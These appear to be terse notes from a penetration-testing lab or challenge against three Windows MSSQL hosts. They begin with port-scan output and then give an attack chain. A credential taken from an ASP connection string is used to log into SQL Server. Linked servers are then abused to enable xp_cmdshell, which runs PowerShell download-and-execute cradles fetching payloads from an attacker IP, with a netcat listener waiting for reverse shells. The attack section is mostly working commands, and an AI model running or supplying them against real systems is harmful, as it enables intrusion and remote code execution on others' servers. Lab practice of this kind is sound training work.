Network
192.168.181.140
192.168.181.141
192.168.181.142
Rustscan
rustscan -a 192.168.181.140 192.168.181.141 192.168.181.142 --ulimit 5000 -- -Pn -sC -sV -oA challenge2
Open 192.168.181.140:80
Open 192.168.181.140:1433
Open 192.168.181.141:1433
Open 192.168.181.142:1433
Open 192.168.181.140:3389
Open 192.168.181.141:3389
Open 192.168.181.142:3389
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Music Inventory
| http-cookie-flags:
| /:
| ASPSESSIONIDQABTDSRD:
|_ httponly flag not set
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.181.140:1433:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 192.168.181.140:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-13T07:27:25+00:00
| ssl-cert: Subject: commonName=sql11
| Issuer: commonName=sql11
| Public Key type: rsa
| Public Key bits: 2048
oA challenge2" on ip 192.168.181.142
PORT STATE SERVICE REASON VERSION
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.181.142:1433:
| Target_Name: SQL53
| NetBIOS_Domain_Name: SQL53
| NetBIOS_Computer_Name: SQL53
| DNS_Domain_Name: sql53
| DNS_Computer_Name: sql53
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| ms-sql-info:
| 192.168.181.142:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-03-13T07:27:41+00:00; +1m10s from scanner time.
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2024-03-13T07:27:41+00:00; +1m10s from scanner time.
| ssl-cert: Subject: commonName=sql53
| Issuer: commonName=sql53
| rdp-ntlm-info:
| Target_Name: SQL53
| NetBIOS_Domain_Name: SQL53
| NetBIOS_Computer_Name: SQL53
| DNS_Domain_Name: sql53
| DNS_Computer_Name: sql53
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-13T07:27:37+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
oA challenge2" on ip 192.168.181.141
PORT STATE SERVICE REASON VERSION
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.181.141:1433:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 192.168.181.141:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-03-13T07:27:53+00:00; +1m11s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-13T07:27:48+00:00
| ssl-cert: Subject: commonName=sql27
| Issuer: commonName=sql27
192.168.181.140
Authentication Bypass
Use sql-map to get the rev shell and the execute sliver
ConnString="DRIVER={SQL Server};SERVER=localhost;UID=webapp11;PWD=89543dfGDFGH4d;DATABASE=music"
Set Connection = Server.CreateObject("ADODB.Connection")
Set Recordset = Server.CreateObject("ADODB.Recordset")
Connection.Open ConnString
%>
python3 mssqlclient.py webapp11:89543dfGDFGH4d@192.168.181.142
SQL27
python3 mssqlclient.py webapp11:89543dfGDFGH4d@192.168.181.142
select srvname from master..sysservers
select * from openquery("SQL27", 'SELECT is_srvrolemember(''sysadmin'')')
select is_rpc_out_enabled FROM sys.servers WHERE name ='SQL27'
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL27];
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL27];
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [SQL27];
EXEC('EXEC xp_cmdshell ''echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.195:80/large1.ps1") | powershell -noprofile'';') AT [SQL27];
nc -lvnp 1234
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX
SQL53
select srvname from master..sysservers
select * from openquery("SQL53", 'SELECT is_srvrolemember(''sysadmin'')')
select is_rpc_out_enabled FROM sys.servers WHERE name ='SQL53'
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL53];
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL53];
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [SQL53];
EXEC('EXEC xp_cmdshell ''echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.195:80/large1.ps1") | powershell -noprofile'';') AT [SQL53];
nc -lvnp 1234
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX